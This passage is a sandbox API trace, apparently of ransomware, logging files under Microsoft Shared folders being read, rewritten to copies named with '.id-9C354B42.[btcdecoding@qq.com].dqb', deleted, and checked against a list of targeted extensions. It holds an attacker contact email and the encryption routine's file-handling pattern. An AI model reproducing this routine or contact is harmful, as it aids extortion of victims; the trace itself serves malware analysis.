Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.462] GetLastError () returned 0x0 [0040.462] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x708, lpOverlapped=0x0) returned 1 [0040.772] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x710, lpOverlapped=0x0) returned 1 [0040.773] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.773] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0040.773] SetEndOfFile (hFile=0x204) returned 1 [0040.773] CloseHandle (hObject=0x204) returned 1 [0040.774] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.774] SetEndOfFile (hFile=0x208) returned 1 [0040.775] CloseHandle (hObject=0x208) returned 1 [0040.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.775] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 1 [0040.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.775] lstrlenW (lpString=".doc") returned 4 [0040.775] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.775] lstrlenW (lpString=".docx") returned 5 [0040.775] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.775] lstrlenW (lpString=".pdf") returned 4 [0040.775] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.775] lstrlenW (lpString=".xls") returned 4 [0040.775] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString=".xlsx") returned 5 [0040.776] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.776] lstrlenW (lpString=".ppt") returned 4 [0040.776] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.776] lstrlenW (lpString=".zip") returned 4 [0040.776] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.776] lstrlenW (lpString=".rar") returned 4 [0040.776] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString=".bz2") returned 4 [0040.776] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString=".7z") returned 3 [0040.776] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.776] lstrlenW (lpString=".dbf") returned 4 [0040.776] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.776] lstrlenW (lpString=".1cd") returned 4 [0040.776] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.776] lstrlenW (lpString=".jpg") returned 4 [0040.776] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.776] lstrlenW (lpString=".doc") returned 4 [0040.776] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString=".docx") returned 5 [0040.776] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.776] lstrlenW (lpString=".pdf") returned 4 [0040.776] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString=".xls") returned 4 [0040.776] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.776] lstrlenW (lpString=".xlsx") returned 5 [0040.776] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.776] lstrlenW (lpString=".ppt") returned 4 [0040.777] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.777] lstrlenW (lpString=".zip") returned 4 [0040.777] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.777] lstrlenW (lpString=".rar") returned 4 [0040.777] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.777] lstrlenW (lpString=".bz2") returned 4 [0040.777] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.777] lstrlenW (lpString=".7z") returned 3 [0040.777] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.777] lstrlenW (lpString=".dbf") returned 4 [0040.777] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.777] lstrlenW (lpString=".1cd") returned 4 [0040.777] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0040.777] lstrlenW (lpString=".jpg") returned 4 [0040.777] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.777] lstrcmpiW (lpString1=".XSL", lpString2=".dqb") returned 1 [0040.777] lstrlenW (lpString="BASMLA.XSL") returned 10 [0040.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.777] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=227311) returned 1 [0040.778] CloseHandle (hObject=0x208) returned 1 [0040.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 0x20 [0040.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.778] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.778] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.778] GetLastError () returned 0x0 [0040.778] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x377ef, lpOverlapped=0x0) returned 1 [0040.783] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x377f0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x377f0, lpOverlapped=0x0) returned 1 [0040.788] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.788] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe8, lpOverlapped=0x0) returned 1 [0040.788] SetEndOfFile (hFile=0x204) returned 1 [0040.788] CloseHandle (hObject=0x204) returned 1 [0040.791] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.791] SetEndOfFile (hFile=0x208) returned 1 [0040.793] CloseHandle (hObject=0x208) returned 1 [0040.793] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.793] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 1 [0040.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.793] lstrlenW (lpString=".doc") returned 4 [0040.793] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0040.793] lstrlenW (lpString=".docx") returned 5 [0040.793] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0040.793] lstrlenW (lpString=".pdf") returned 4 [0040.793] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0040.793] lstrlenW (lpString=".xls") returned 4 [0040.793] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0040.793] lstrlenW (lpString=".xlsx") returned 5 [0040.794] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0040.794] lstrlenW (lpString=".ppt") returned 4 [0040.794] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.794] lstrlenW (lpString=".zip") returned 4 [0040.794] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0040.794] lstrlenW (lpString=".rar") returned 4 [0040.794] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString=".bz2") returned 4 [0040.794] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString=".7z") returned 3 [0040.794] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0040.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.794] lstrlenW (lpString=".dbf") returned 4 [0040.794] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.794] lstrlenW (lpString=".1cd") returned 4 [0040.794] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.794] lstrlenW (lpString=".jpg") returned 4 [0040.794] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.794] lstrlenW (lpString=".doc") returned 4 [0040.794] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString=".docx") returned 5 [0040.794] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0040.794] lstrlenW (lpString=".pdf") returned 4 [0040.794] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString=".xls") returned 4 [0040.794] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString=".xlsx") returned 5 [0040.794] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0040.794] lstrlenW (lpString=".ppt") returned 4 [0040.794] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0040.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.795] lstrlenW (lpString=".zip") returned 4 [0040.795] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0040.795] lstrlenW (lpString=".rar") returned 4 [0040.795] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0040.795] lstrlenW (lpString=".bz2") returned 4 [0040.795] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0040.795] lstrlenW (lpString=".7z") returned 3 [0040.795] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0040.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.795] lstrlenW (lpString=".dbf") returned 4 [0040.795] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0040.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.795] lstrlenW (lpString=".1cd") returned 4 [0040.795] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0040.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0040.795] lstrlenW (lpString=".jpg") returned 4 [0040.795] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0040.795] lstrcmpiW (lpString1=".TXT", lpString2=".dqb") returned 1 [0040.795] lstrlenW (lpString="METCONV.TXT") returned 11 [0040.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.796] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1183416) returned 1 [0040.796] CloseHandle (hObject=0x208) returned 1 [0040.796] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 0x20 [0040.796] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.796] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.796] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.797] GetLastError () returned 0x0 [0040.797] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xffff0, lpOverlapped=0x0) returned 1 [0040.818] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0041.181] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x20ec8, lpOverlapped=0x0) returned 1 [0041.190] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x20ed0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x20ed0, lpOverlapped=0x0) returned 1 [0041.195] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0041.195] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0041.195] SetEndOfFile (hFile=0x204) returned 1 [0041.196] CloseHandle (hObject=0x204) returned 1 [0041.206] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0041.206] SetEndOfFile (hFile=0x208) returned 1 [0041.208] CloseHandle (hObject=0x208) returned 1 [0041.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0041.208] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 1 [0041.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.208] lstrlenW (lpString=".doc") returned 4 [0041.208] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0041.209] lstrlenW (lpString=".docx") returned 5 [0041.209] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0041.209] lstrlenW (lpString=".pdf") returned 4 [0041.209] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0041.209] lstrlenW (lpString=".xls") returned 4 [0041.209] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0041.209] lstrlenW (lpString=".xlsx") returned 5 [0041.209] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0041.209] lstrlenW (lpString=".ppt") returned 4 [0041.209] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.504] lstrlenW (lpString=".zip") returned 4 [0041.504] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0041.504] lstrlenW (lpString=".rar") returned 4 [0041.504] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString=".bz2") returned 4 [0041.504] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString=".7z") returned 3 [0041.504] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0041.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.504] lstrlenW (lpString=".dbf") returned 4 [0041.504] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.504] lstrlenW (lpString=".1cd") returned 4 [0041.504] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.504] lstrlenW (lpString=".jpg") returned 4 [0041.504] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.504] lstrlenW (lpString=".doc") returned 4 [0041.504] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString=".docx") returned 5 [0041.504] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0041.504] lstrlenW (lpString=".pdf") returned 4 [0041.504] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString=".xls") returned 4 [0041.504] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0041.504] lstrlenW (lpString=".xlsx") returned 5 [0041.504] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0041.504] lstrlenW (lpString=".ppt") returned 4 [0041.504] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0041.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.505] lstrlenW (lpString=".zip") returned 4 [0041.505] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0041.505] lstrlenW (lpString=".rar") returned 4 [0041.505] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0041.505] lstrlenW (lpString=".bz2") returned 4 [0041.505] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0041.505] lstrlenW (lpString=".7z") returned 3 [0041.505] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0041.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.505] lstrlenW (lpString=".dbf") returned 4 [0041.505] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0041.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.505] lstrlenW (lpString=".1cd") returned 4 [0041.505] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0041.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0041.505] lstrlenW (lpString=".jpg") returned 4 [0041.505] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0041.516] lstrcmpiW (lpString1=".htm", lpString2=".dqb") returned 1 [0041.516] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0041.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.506] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=237) returned 1 [0042.506] CloseHandle (hObject=0x174) returned 1 [0042.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0042.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.506] lstrlenW (lpString="C:\\Program 